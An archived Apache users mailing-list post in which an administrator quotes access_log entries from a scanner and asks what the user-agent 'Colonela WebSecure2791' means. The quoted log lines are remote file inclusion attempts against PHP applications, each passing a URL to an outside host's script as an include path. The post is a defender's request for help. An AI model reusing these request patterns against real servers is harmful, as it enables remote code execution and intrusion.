Colonela WebSecure2791 in agent_log

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



Hello,

I am new to Apache and am running version 1.3.29 on OpenBSD. Recently
crackers and script kiddies have been scanning my server. I don't
think any one has broken in yet. On April 2nd I noticed some
interesting entries in my access_log, error_log, and agent_log. For
exmaple:

A small part of access_log:

70.84.195.34 - - [02/Apr/2007:20:51:21 -0500] "GET
/cnl_prod/pmb/opac_css/includes/resa_func.inc.php?class_path=http://210.18.229.21/statistic
.txt?&/ HTTP/1.1" 404 254
70.84.195.34 - - [02/Apr/2007:20:51:21 -0500] "GET
/pmb/opac_css/includes/resa_func.inc.php?class_path=http://210.18.229.21/statistic.txt?&/
H
TTP/1.1" 404 245
70.84.195.34 - - [02/Apr/2007:20:51:21 -0500] "GET
/opac_css/includes/resa_func.inc.php?class_path=http://210.18.229.21/statistic.txt?&/
HTTP/
1.1" 404 241
70.84.195.34 - - [02/Apr/2007:20:51:21 -0500] "GET
/limbo/classes/adodbt/sql.php?classes_dir=http://210.18.229.21/statistic.txt?&/
HTTP/1.1" 4
04 234
70.84.195.34 - - [02/Apr/2007:20:51:22 -0500] "GET
/eqdkp/includes/dbal.php?eqdkp_root_path=http://210.18.229.21/statistic.txt?&/
HTTP/1.1" 40
4 229
70.84.195.34 - - [02/Apr/2007:20:51:22 -0500] "GET
/includes/db_adodb.php?baseDir=http://210.18.229.21/statistic.txt?&/
HTTP/1.1" 404 227

The person from 70.84.195.34 attempted to get 142 different
non-existent documents from my server. All the attempts resulted in
error code 404.

All the entries in the agent_log for 70.84.195.34 look like this:

Colonela WebSecure2791

I Googled it and found nothing. So here's my question. What is
"Colonela WebSecure2791"?

Thanks in advance for your feedback.
--
Sean Malloy
Registered GNU/Linux User #417855
Happy Hacking! ;-)

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx
  "   from the digest: users-digest-unsubscribe@xxxxxxxxxxxxxxxx
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx


[Index of Archives]     [Open SSH Users]     [Linux ACPI]     [Linux Kernel]     [Linux Laptop]     [Kernel Newbies]     [Security]     [Netfilter]     [Bugtraq]     [Squid]     [Yosemite News]     [MIPS Linux]     [ARM Linux]     [Linux Security]     [Linux RAID]     [Samba]     [Video 4 Linux]     [Device Mapper]

  Powered by Linux